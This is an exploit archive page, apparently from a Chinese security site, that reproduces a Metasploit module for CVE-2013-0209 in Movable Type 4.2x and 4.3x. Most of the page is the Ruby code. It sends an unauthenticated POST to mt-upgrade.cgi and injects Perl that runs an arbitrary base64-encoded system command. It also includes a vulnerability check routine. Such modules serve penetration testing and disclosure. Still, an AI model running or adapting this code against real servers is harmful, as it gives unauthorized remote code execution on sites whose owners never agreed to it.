首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution
来源:metasploit.com 作者:Kacper 发布时间:2013-01-25  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

 include Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution',
   'Description'    => %q{
     This module can be used to execute a payload on MoveableType (MT) that
     exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi),
     that is used during installation and updating of the platform.
     The vulnerability arises due to the following properties:
     1. This script may be invoked remotely without requiring authentication
     to any MT instance.
     2. Through a crafted POST request, it is possible to invoke particular
     database migration functions (i.e functions that bring the existing
     database up-to-date with an updated codebase) by name and with
     particular parameters.
     3. A particular migration function, core_drop_meta_for_table, allows
     a class parameter to be set which is used directly in a perl eval
     statement, allowing perl code injection.
   },
   'Author'         =>
    [
     'Kacper Nowak',
     'Nick Blundell',
     'Gary O\'Leary-Steele'
    ],
   'References'     =>
    [
     ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
     ['CVE', '2013-0209'],
     ['URL', 'http://www.sec-1.com/blog/?p=402'],
     ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
    ],
   'Arch'   => ARCH_CMD,
   'Payload'  =>
    {
     'Compat' =>
      {
       'PayloadType' => 'cmd'
      }
    },
   'Platform'  =>
    [
     'win',
     'unix'
    ],
   'Targets'  =>
    [
     ['Movable Type 4.2x, 4.3x', {}]
    ],
   'Privileged'  => false,
   'DisclosureDate' => "Jan 07 2013",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt'])
   ], self.class)
 end

 def check
  @peer = "#{rhost}:#{rport}"
  fingerprint = rand_text_alpha(5)
  print_status("#{@peer} - Sending check...")
  begin
   res = http_send_raw(fingerprint)
  rescue Rex::ConnectionError
   return Exploit::CheckCode::Unknown
  end
  if (res)
   if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/)
    return Exploit::CheckCode::Vulnerable
   elsif (res.code != 200)
    return Exploit::CheckCode::Unknown
   else
    return Exploit::CheckCode::Safe
   end
  else
   return Exploit::CheckCode::Unknown
  end
 end

 def exploit
  @peer = "#{rhost}:#{rport}"
  print_status("#{@peer} - Sending payload...")
  http_send_cmd(payload.encoded)
 end

 def http_send_raw(cmd)
  path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
  pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
  send_request_cgi(
   {
    'uri'       => path,
    'method'    => 'POST',
    'vars_post' =>
     {
      '__mode'     => 'run_actions',
      'installing' => '1',
      'steps'      => %{[["core_drop_meta_for_table","class","#{pay}"]]}
     }
   })
 end

 def http_send_cmd(cmd)
  pay = 'v0;use MIME::Base64;system(decode_base64(q('
  pay << Rex::Text.encode_base64(cmd)
  pay << ')));return 0'
  http_send_raw(pay)
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZoneMinder Video Server packag
·SonicWALL GMS 6 Arbitrary File
·Simatic WinCC Information Harv
·Novell eDirectory 8 Buffer Ove
·Java Applet AverageRangeStatis
·Barracuda Networks SSHd Backdo
·Java Applet Method Handle Remo
·KMPlayer 3.5.0.77 Denial Of Se
·NVidia Display Driver Service
·Windows Manage Memory Payload
·Jenkins CI Script Console Comm
·SQLiteManager 1.2.4 Remote PHP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved